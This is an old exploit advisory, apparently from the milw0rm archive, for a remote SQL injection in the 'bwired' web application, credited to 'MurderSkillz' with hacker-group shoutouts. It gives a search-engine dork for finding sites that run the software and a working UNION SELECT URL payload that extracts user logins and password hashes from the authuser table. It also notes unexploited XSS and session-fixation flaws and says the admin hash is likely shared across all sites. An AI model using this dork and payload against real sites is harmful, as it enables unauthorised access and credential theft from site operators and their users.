1 ###############################################################################################
2 # ___ ___ _
3 # / _ \ / _ \ | |
4 # __ _| | | | | | |_ __ ___ _ __ ___| |_
5 # / _‘ | | | | | | | ’_ \/ __| | ’_ \ / _ \ __|
6 # | (_| | |_| | |_| | | | \__ \_| | | | __/ |_
7 # \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__|
8 # __/ |
9 # |___/
10 ###############################################################################################
11 #Program Title ################################################################################
12 #bwired − Remote SQL Injection
13 #
14 #Note #######################################################################################
15 #There is also XSS, PHPSESSID session fixation, and cookie manipulation which I will not go into..
16 #The admin hash will be the same for all the sites I believe. Seeing all the sites are managed by the creator of the
webapp.
17 #Script Website ##############################################################################
18 #http://web.bwired.com.au
19 #
20 #d0rk ######################################################################################
21 #"Powered by bwired" inurl:?newsID=
22 #
23 #Spl0it #########################################################################################
24 #http://vicsite.com/[pathtobwired]/index.php?newsID=−99%20union%20all%20select 1, 2,concat(user_login,0x20,0x3a,0x20,
user_passwd),4, 5, 6, 7, 8, 9, 10, 11%20from%20authuser
25 #
26 #vuln discovered by ###############################################################################
27 #MurderSkillz
28 #
29 #shoutz: z3r0, fish, milf, ScUzZ, godxcel, clorox, katalyst, SyNiCaL, OD, pr0be, rezen, str0ke,
30 #fish, rey, canuck, c0ma, grumpy, err0r, sick, trintitty, asdfhacks.com , a59, freeillwill.com, fury,
31 #<S>, Bernard and everyone else at g00ns.net
32 ###############################################################################################
33
34 # milw0rm.com [2007−07−22]